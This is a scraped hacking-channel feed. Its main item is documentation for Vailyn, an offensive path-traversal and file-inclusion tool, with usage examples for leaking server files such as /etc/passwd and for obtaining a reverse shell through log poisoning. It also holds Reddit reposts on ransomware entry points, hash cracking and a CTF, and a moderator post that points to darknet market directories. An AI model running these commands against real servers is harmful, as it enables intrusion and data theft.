Hacking Articles Tips Tricks Videos Tutorials
471 subscribers
65.9K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Vailyn

Phased Path Traversal (https://www.kitploit.com/search/label/Path%20Traversal) & LFI Attacks Vailyn 3.0 Since v3.0, Vailyn supports LFI PHP wrappers in Phase 1. Use --lfi to include them in the scan.
About
Vailyn is a multi-phased vulnerability analysis (https://www.kitploit.com/search/label/Vulnerability%20Analysis) and exploitation tool for path traversal and file inclusion vulnerabilities. It is built to make it as performant as possible, and to offer a wide arsenal of filter evasion techniques.
How does it work?
Vailyn operates in 2 phases. First, it checks if the vulnerability is present. It does so by trying to access /etc/passwd (or a user-specified file), with all of its evasive payloads. Analysing the response, payloads that worked are separated from the others. Now, the user can choose freely which payloads to use. Only these payloads will be used in the second phase. The second phase is the exploitation phase. Now, it tries to leak all possible files from the server using a file and a directory dictionary. The search depth and the directory permutation level can be adapted via arguments. Optionally, it can download found files, and save them in its loot folder. Alternatively, it will try to obtain a reverse shell on the system, letting the attacker gain full control over the server. Right now, it supports multiple attack vectors: injection via query, path, cookie and POST data.
Why the phase separation?
The separation in several phases is done to hugely improve the performance of the tool. In previous versions, every file-directory combination was checked with every payload. This resulted in a huge overhead due to payloads being always used again, despite not working for the current page.
Installation
Recommended & tested Python versions are 3.7+, but it should work fine with Python 3.5 & Python 3.6, too. To install Vailyn, download the archive from the release tab, or perform $ git clone https://github.com/VainlyStrain/Vailyn
Once on your system, you'll need to install the Python dependencies.
Unix Systems
On Unix systems, it is sufficient to run $ pip install -r requirements.txt # --user

Windows
Some libraries Vailyn uses do not work well with Windows, or will fail to install. If you use Windows, use pip to install the requirements listed in Vailyn\·›\requirements-windows.txt. If twisted fails to install, there is an unofficial version available here (https://www.lfd.uci.edu/~gohlke/pythonlibs/#twisted), which should build under Windows. Just bear in mind that this is a 3rd party download, and the integrity isn't necessarily guaranteed. After this installed successfully, running pip again on requirements-windows.txt should work.
Final Steps
If you want to fully use the reverse shell module, you'll need to have sshpass, ncat and konsole installed. Package names vary by Linux distribution. On Windows, you'll need to start the listener manually beforehand. If you don't like konsole, you can specify a different terminal emulator in core/config.py. That's it! Fire Vailyn up by moving to its installation directory and performing $ python Vailyn -h

Usage
Vailyn has 3 mandatory arguments: -v VIC, -a INT and -p2 TP P1 P2. However, depending on -a, more arguments may be required. , \ / ,
':. \. /\. ./ .:'
':;. :\ .,:/ ''. /; ..::'
',':.,.__.'' ' ' `:.__:''.:'
';.. ,;' *
* '., .:'
`v;. ;v' o
. ' '.. :.' ' .
' ':;, ' '
o ' . :
*
| Vailyn |
[ VainlyStrain ]

Vsynta Vailyn -v VIC -a INT -p2 TP P1 P2

___________________________
@hacking_Attack
@Hacking_Video
[-p PAM] [-i F] [-Pi VIC2]
[-c C] [-n] [-d I J K]
[-s T] [-t] [-L]
[-l] [-P] [-A]

mandatory:
-v VIC, --victim VIC Target to attack, part 1 [pre-payload]
-a INT, --attack INT Attack type (int, 1-5, or A)< br/>
A| Spider (all) 2| Path 5| POST Data, json
P| Spider (partial) 3| Cookie
1| Query Parameter 4| POST Data, plain

-p2 TP P1 P2, --phase2 TP P1 P2
Attack in Phase 2, and needed parameters

┌[ Values ]─────────────┬────────────────────┐
│ TP │ P1 │ P2 │
├─────────┼─────────────┼────────────────────┤
│ leak │ File Dict │ Directory Dict │
│ inject │ IP Addr │ Listening Port │
│ implant │ Source File │ Server Destination │
└─────────┴─────────────┴────────────────────┘

additional:
-p PAM, --param PAM query parameter or POST data for --attack 1, 4, 5
-i F, --check F File to check for in Phase 1 (df: etc/passwd)
-Pi VIC2, --vic2 VIC2 Attack Target, part 2 [post-payload]
-c C, --cookie C Cookie to append (in header format)
-l, --loot Download found files into the loot folder
-d I J K, --depths I J K
depths (I: phase 1, J: phase 2, K: permutation level )
-h, --help show this help menu and exit
-s T, --timeout T Request Timeout; stable switch for Arjun
-t, --tor Pipe attacks through the Tor anonymity network
-L, --lfi Additionally use PHP wrappers to leak files
-n, --nosploit skip Phase 2 (does not need -p2 TP P1 P2)
-P, --precise Use exact depth in Phase 1 (not a range)
-A, --app Start Vailyn's Qt5 interface

develop:
--debug Display every path tried, even 404s.
--version Print program version and exit.
--notmain Avoid notify2 crash in subprocess call.

Info:
to leak files using absolute paths: -d 0 0 0
to get a shell using absolute paths: -d 0 X 0
Vailyn currently supports 5 attack vectors, and provides a crawler to automate all of them. The attack performed is identified by the -a INT argument. INT attack
---- -------
1 query-based attack (https://site.com?file=../../../)
2 path-based attack (https://site.com/../../../)
3 cookie-based attack (will grab the cookies for you)
4 plain post data (ELEM1=VAL1&ELEM2=../../../)
5 json post data ({"file": "../../../"})
A spider fetch + analyze all URLs from site using all vectors
P partial spider fetch + analyze all URLs from site using only selected vectors
You also must specify a target to attack. This is done via -v VIC and -Pi VIC2, where -v is the part before the injection point, and -Pi the rest. Example: if the final URL should look like: https://site.com/download.php?file=¶m2=necessaryvalue, you can specify -v https://site.com/download.php and -Pi ¶m2=necessaryvalue (and -p file, since this is a query attack). If you want to include PHP wrappers in the scan (like php://filter), use the --lfi argument. At the end of Phase 1, you'll be presented with an additional selection menu containing the wrappers that worked. (if any) If the attacked site is behind a login page, you can supply an authentication (https://www.kitploit.com/search/label/Authentication) cookie via -c COOKIE. If you want to attack over Tor, use --tor.
Phase 1
This is the analysis phase, where working payloads are separated from the others. By default, /etc/passwd is looked up. If the server is not running Linux, you can specify a custom file by -i FILENAME. Note that you must include subdirectories in FILENAME. You can modify the lookup depth with the first value of -d (default=8). If you want to use absolute paths, set the first depth to 0.
Phase 2

___________________________
@hacking_Attack
@Hacking_Video
This is the exploitation phase, where Vailyn will try to leak as much files as possible, or gain a reverse shell using various techniques. The depth of lookup in phase 2 (the maximal number of layers traversed back) is specified by the second value of the -d argument. The level of subdirectory permutation is set by the third value of -d. If you attack with absolute paths and perform the leak attack, set all depths to 0. If you want to gain a reverse shell, make sure that the second depth is greater than 0. By specifying -l, Vailyn will not only display files on the terminal, but also download and save the files into the loot folder. If you want a verbose output (display every output, not only found files), you can use --debug. Note that output gets really messy, this is basically just a debug help. To perform the bruteforce attack, you need to specify -p2 leak FIL PATH, where FIL is a dictionary file containing filenames only (e.g. index.php) PATH, is a dictionary file containing directory names only. Vailyn will handle directory permutation for you, so you'll need only one directory per line. To gain a reverse shell by code injection, you can use -p2 inject IP PORT, where IP is your listening IP PORT is the port you want to listen on. WARNING Vailyn employs Log Poisoning techniques. Therefore, YOUR SPECIFIED IP WILL BE VISIBLE IN THE SERVER LOGS. The techniques (only work for LFI inclusions): /proc/self/environ inclusion only works on outdated servers Apache + Nginx Log Poisoning & inclusion SSH Log Poisoning poisoned mail inclusion wrappers expect:// data:// (plain & b64) php://input
False Positive prevention
To distinguish real results from false positives, Vailyn does the following checks: check the status code of the response check if the response is identical to one taken before attack start: this is useful e.g, when the server returns 200, but ignores the payload input or returns a default page if the file is not found. similar to #2, perform an additional check for query GET parameter handling (useful when server returns error that a needed parameter is missing) check for empty responses check if common error signatures are in the response content check if the payload is contained in the response: this is an additional check for the case the server responds 200 for non-existing files, and reflects the payload in a message (like ../../secret not found) check if the entire response is contained in the init check response: useful when the server has a default include which disappears in case of 404 for -a 2, perform an additional check if the response content matches the content from the server root URL REGEX check for /etc/passwd if using that as lookup file
Examples
Simple Query attack, leaking files in Phase 2: $ Vailyn -v "http://site.com/download.php" -a 1 -p2 leak dicts/files dicts/dirs -p file --> http://site.com/download.php?file=../INJECT Query attack, but I know a file file.php exists on exactly 2 levels above the inclusion point: $ Vailyn -v "http://site.com/download.php" -a 1 -p2 leak dicts/files dicts/dirs -p file -i file.php -d 2 X X -P This will shorten the duration of Phase 1 very much, since its a targeted attack. Simple Path attack: $ Vailyn -v "http://site.com/" -a 2 -p2 leak dicts/files dicts/dirs --> http://site.com/../INJECT Path attack, but I need query parameters and tag: $ Vailyn -v "http://site.com/" -a 2 -p2 leak dicts/files dicts/dirs -Pi "?token=X#title" --> http://site.com/../INJECT?token=X#title Simple Cookie attack: $ Vailyn -v "http://site.com/cookiemonster.php" -a 3 -p2 leak dicts/files dicts/dirs Will fetch cookies and you can select cookie you want to poison POST Plain Attack: $ Vailyn -v "http://site.com/download.php" -a 4 -p2 leak dicts/files dicts/dirs -p "DATA1=xx&DATA2=INJECT" will infect DATA2 with the payload POST JSON Attack: $ Vailyn -v "http://site.com/download.php"

___________________________
@hacking_Attack
@Hacking_Video
-a 5 -p2 leak dicts/files dicts/dirs -p '{"file": "INJECT"}' Attack, but target is behind login screen: $ Vailyn -v "http://site.com/" -a 1 -p2 leak dicts/files dicts/dirs -c "sessionid=foobar" Attack, but I want a reverse shell on port 1337: $ Vailyn -v "http://site.com/download.php" -a 1 -p2 inject MY.IP.IS.XX 1337 # a high Phase 2 Depth is needed for log injection (will start a ncat listener for you if on Unix) Full automation in crawler mode: $ Vailyn -v "http://root-url.site" -a A you can also specify other args, like cookie, depths, lfi & lookup file here Full automation, but Arjun needs --stable: $ Vailyn -v "http://root-url.site" -a A -s ANY
Demo

___________________________
@hacking_Attack
@Hacking_Video
Vailyn's Crawler analyzing a damn vulnerable (https://www.kitploit.com/search/label/Damn%20Vulnerable) web application. LFI Wrappers are not enabled. GUI Demonstration (v2.2.1-5) (https://www.youtube.com/watch?v=rFlR_SHk9fc)
Possible Issues
Found some false positives/negatives (or want to point out other bugs/improvements): please leave an issue!
Code of Conduct
Vailyn is provided as an offensive web application audit tool. It has built-in functionalities which can reveal potential vulnerabilities (https://www.kitploit.com/search/label/vulnerabilities) in web applications, which could be exploited maliciously. THEREFORE, NEITHER THE AUTHOR NOR THE CONTRIBUTORS ARE RESPONSIBLE FOR ANY MISUSE OR DAMAGE DUE TO THIS TOOLKIT. By using this software, the user obliges to follow their local laws, to not attack someone else's system without explicit permission from the owner, or with malicious intent. In case of an infringement, only the end user who committed it is accountable for their actions.
Credits & Copyright
Vailyn: Copyright © VainlyStrain (https://github.com/VainlyStrain) Arjun: Copyright © s0md3v (https://github.com/s0md3v) Arjun is no longer distributed with Vailyn. Install its latest version via pip.

Download Vailyn (https://github.com/VainlyStrain/Vailyn)

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Is it all spear fishing nowadays?

Ransomware is all over the news and they targeting all kinds of companies. But what is the initial attack vector for most of the victims? For hospitals and smaller companies and so on which do not host or expose direct IPs accessible from the internet directly. I can only imagine spear fishing attacks to be effective. Hacking a website just leaves you on a virtual server of the hosting company and how do they proceed from there? Is this not to cumbersome?

I am not a hacker myself, just a curious programmer and just can not imagine whats possible.

submitted by /u/FoC-Raziel
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Is there a way to bruteforce a SHA256 Hash Password if I know some of the words?

So I have a SHA256 hash password which I can narrow down to like 10 words, one of which is probably present in the actual password, so can I unhash it?

Also, I'm not a hacker or experienced in programming, just trying to find the password to an old email of mine so don't troll me if it's a dumb question.

submitted by /u/No-Donut6391
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Write permissions in a sub-directory-- abuse?

Hi all,

I'm working through a CTF, and I'm a bit stumped. I'm pretty sure I'm over-thinking it.

I have access to a user's Home directory, and there's a FLAG in there, but I don't have read access. However, there's a sub-directory in said user's Home that I have r+w+x permissions in.

There is a bot running some mundane binary in that sub-directory regularly, that seems to just update a timestamp text-file. I don't have any permissions on that binary.

If I move or rename that binary, the bot stops updating the timestamp. My idea is to somehow get the bot to run a small script to open up permissions in the parent directory, but I'm not sure how to go about this.

Since I have write permissions in that folder, I can move, create, and delete files, but even if I create a binary with the same name, the bot doesn't seem to run it. I have a feeling it's linked to the actual inode of that executable. I'm a bit stumped!

submitted by /u/InfamousClyde
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Hacking books

So fellow redditors so far haven't let me down so here goes again me taking advice, sugggetions on any great books referring to Hacking. Open to all suggestions. Thanks guys ! ;)

submitted by /u/Maris_saD
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
Hacking on Medium
Weaponizing Reflected XSS to Account Takeover


Hi fellow hunters, this is my first writeup for the community in which i will explain how i found a reflected cross site scripting bug and…

Continue reading on Medium »
Hacking on Medium
Lame has been Pwned!


I’m back once again doing Hack The Box machines. I have recently hacked all the Starting Point machines and am now moving on to the…

Continue reading on Medium »
Hacking on Medium
La confianza Zero Trust requiere seguridad de datos en la nube con una evaluación de riesgos de…


PUBLICADO EN 15 SEPTIEMBRE, 2021POR EHACKING

Continue reading on Medium »
Deep Web
REMINDER - Read This Before Posting

I posted this a while back, but now we have people digging through YEARS old posts and reporting violating content - often not to us, but directly to the Reddit admins. This means that Reddit's Anti-Evil Operations team has been spending more time digging through our subreddit and looking for content in violation of Reddit's rules.

You can find the original post and its discussion here.

If you see posts that are in violation of Reddit's rules or the subreddit rules, use the report button. Do not engage with it. Don't comment. Just report it to us, and please move on.

Reddit admins have been watching this sub lately, which means that we are possibly on the verge of being quarantined and/or banned. A few things need to be repeated (yet again), since people seem to not be able to follow the rules: Do NOT discuss or mention child exploitation material...at all.* Don't ask about it.
* Don't ask where to get it.
* Don't ask if people remember it.
* Do. Not. Mention. Child exploitation material. Period.

If someone does mention it - before they're banned - please do not muse about the awful things that should happen to the perpetrators/producers of said material. Yes, we all agree that they're the scum of the earth and horrible things should happen to them.

However, in the eyes of Reddit admins - who, again, are now watching this subreddit - these musings can be and are seen as calls to violence. Do NOT discuss or mention drugs, markets, or anything illegal on this subreddit.We do our best to automatically weed out posts about these topics with the AutoModerator, and when they're found, the following advice is given:

You appear to be asking a specific question related to darknet markets. Due to Reddit's actions on some other subreddits, The moderators have determined that it's not safe to host such discussions here if we want to be able to continue providing this sub as an educational resource.

We have, however, come up with some resources that may help you in terms of finding an appropriate place to ask such questions:

* Dark.fail is a popular onion service monitor that verifies links via PGP to ensure you're not accessing a phishing site
* Darknet Live is a news focused site that also contains links to popular onion services
* Dread is an established darknet discussion forum similar to Reddit, but with fewer restrictions (see also: r/DreadAlert for updates)
* Real World Onion Sites is a listing of several popular onion services that are less "legally gray"

If a post makes it by the filter (or if someone makes a comment that mentions these) please use the report feature. Do not further engage the posts. Do not answer the questions. Report the post/comment as a violation of Rule 2, and move on.

If the post or comment is a particularly grievous violation, feel free to send us a ModMail message to let us know about it. Repeat postsFor the new people - you're not the first person to wonder what the creepiest thing someone found, ask for "good links" etc. etc. etc. There seems to be like half a dozen of these same questions asked several times a week in different variations. USE THE SEARCH BAR BEFORE POSTING.

This is another situation where we try to catch posts with AutoModerator and provide answers.

To the regulars: If the AutoModerator answers OP's question, please feel free to upvote it. Everyone - Please review the RulesWe want to keep this subreddit a useful and educational resource for new folks. We cannot do this if it's banned, and a quarantine would essentially be a death knell for this sub, if that's its intended purpose, as new people aren't going to visit a quarantined subreddit to ask questions.

Thank you for your attention and cooperation.

submitted by /u/TheNerdyAnarchist [link] [comm[...]

___________________________
@hacking_Attack
@Hacking_Video